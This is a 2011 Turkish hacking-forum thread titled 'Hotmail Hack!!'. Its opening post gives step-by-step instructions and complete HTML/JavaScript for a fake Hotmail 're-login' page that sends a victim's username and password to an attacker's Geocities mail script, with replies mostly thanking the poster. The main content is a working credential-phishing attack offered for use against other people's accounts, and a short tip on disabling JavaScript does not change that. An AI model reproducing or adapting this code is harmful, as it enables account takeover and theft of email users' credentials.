Turkhackteam.net/org - Turkish Hacking & Security Platform...  

Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Mail Güvenliği

Mail Güvenliği Fake Mail Ve Tüm Yönleriyle Mail Güvenlik Açıkları Bölümü ...(Dökümanlar Tamamen Eğitim Amaçlıdır.)

TSK Mehmetçik Vakfı



Hotmail Hack!!

Mail Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 30-08-2011   #1
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Mesajlar
5
Konular
2
Ettiği Teşekkür
3
Thanked 1 Time in 1 Post
  
Post Hotmail Hack!!


HOTMAIL HACK

Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?

Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi zaman
Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca
size kurbanin kullanici adi ve ip adresini iceren bir e-mail geliyor.

Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini
kazaniyorsunuz.silmek, okumak, kurban adina mailler göndermek... Tabii siz bos durmayip POP
Mail'leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin sifrelerini
aliyorsunuz.



Peki bu olaydan kurtulamayacagiz mi ??? .

Netscape kullanicilari javascript ayarlarini söyle kapatabilir.
(edit / preferences / advanced / disablejavascript).

Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir.
(view / internet options /security / custom settings / scripting / disable active scripting).



Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???

Asagidaki Listedekiler elimizde olmali.

1 Internete bagli bir bilgisayar... eh yani :-))
1 Netscape Mail (veya herhangi bir e-mail programi)
1 Notepad (veya herhangi bir text editor)


1.ADIM:

hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.



2.ADIM:

Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda
e-mail adresini kullandik.ve geocities'ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).



3.ADIM:

NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit
ediyoruz. Satir 17'de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi.
(bu kullanici adini kendinize göre degistirin.)




<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
**********
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nbsp;</font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\">&nbsp;<input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.********.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.********.links[i].target="work";
top.submenu.********.links[i].href="javascript:getmess()";
}

noworklinks=top.work.********.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.********.links[i].target="work";
top.work.********.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>



4.ADIM

kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban,
(victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.



5.ADIM

Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman
Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail'de
kurbanimizin kullanici adi, sifresi ve ip adresi oluyor...


Alıntıdır!!!!
    

Konu ReaL333 tarafından (30-08-2011 Saat 10:30 ) değiştirilmiştir..
Offline  
Alıntı ile Cevapla
Alt 30-08-2011   #2
  • 1.Seviye
  • Offline
  • Tümgeneral
  • Genel Bilgiler
Üyelik tarihi
Aug 2009
Nerden
TurkHackTeam
Yaş
27
Mesajlar
Konular
Ettiği Teşekkür
583
1.380 Mesajına
1.869Teşekkür Aldı
  

Taşındı>>>>>> mail güvenliği bölümüne
    


__________________


Darkness DeviL
İs
Everywhere.

Offline  
Alıntı ile Cevapla
Alt 30-08-2011   #3
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Mesajlar
5
Konular
2
Ettiği Teşekkür
3
Thanked 1 Time in 1 Post
  

Teşekkür Ederim
    
Offline  
Alıntı ile Cevapla
Alt 30-08-2011   #4
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Nerden
Geldiğini Bilmiyor
Mesajlar
Konular
Ettiği Teşekkür
5
30 Mesajına
39Teşekkür Aldı
  

Sağol
    


__________________

Flawless Graphic
----------------------------------------------
Joker & Allame - 6126
Offline  
Alıntı ile Cevapla
Alt 31-08-2011   #5
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Aug 2010
Nerden
Hatay
Mesajlar
Konular
Ettiği Teşekkür
54
15 Mesajına
43Teşekkür Aldı
  

Kesin işe yarar mı ?
    
Offline  
Alıntı ile Cevapla
Alt 31-08-2011   #6
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Nerden
LANETLİ ŞEHİR
Mesajlar
Konular
0
Ettiği Teşekkür
2
19 Mesajına
27Teşekkür Aldı
  

teşekürller


AZRAİL4C
    
Offline  
Alıntı ile Cevapla
Bu üyeler azrail4c nickli üyenin mesajına teşekkür etti.
gevez (31-08-2011), lordprens (31-08-2011)
Alt 31-08-2011   #7
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Mesajlar
5
Konular
1
Ettiği Teşekkür
0
0 Mesajına
0Teşekkür Aldı
  

teşekkürler
    
Offline  
Alıntı ile Cevapla
Alt 31-08-2011   #8
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Nerden
LANETLİ ŞEHİR
Mesajlar
Konular
0
Ettiği Teşekkür
2
19 Mesajına
27Teşekkür Aldı
  

Iyi ki buraya geldim ya artık hep burda olacam :d
    
Offline  
Alıntı ile Cevapla
Alt 31-08-2011   #9
  • Offline
  • Teğmen
  • Genel Bilgiler
Üyelik tarihi
Jan 2011
Nerden
karaman
Mesajlar
Konular
Ettiği Teşekkür
39
6 Mesajına
9Teşekkür Aldı
  

işe yaraya bilir
    


__________________

Türk
Hack

Team



Kral soytarıyı üzerse kralın başına birşey gelmez .
Soytarı kralı üzerse söylenecek tek söz ;
Tez kellesi vurula !

Offline  
Alıntı ile Cevapla
Alt 31-08-2011   #10
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Aug 2011
Nerden
istanbul
Mesajlar
1
Konular
0
Ettiği Teşekkür
0
0 Mesajına
0Teşekkür Aldı
  

Güzel PAylaşım . Emeğine Sağlık .
    
Offline  
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam Türk sitelerine kesinlikle zarar vermez, bu sitelerin güvenlik açıklarını site sahibine bildirmek için çaba sarfeder.




Powered by vBulletin® Copyright ©2000 - 2015



Google Links



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.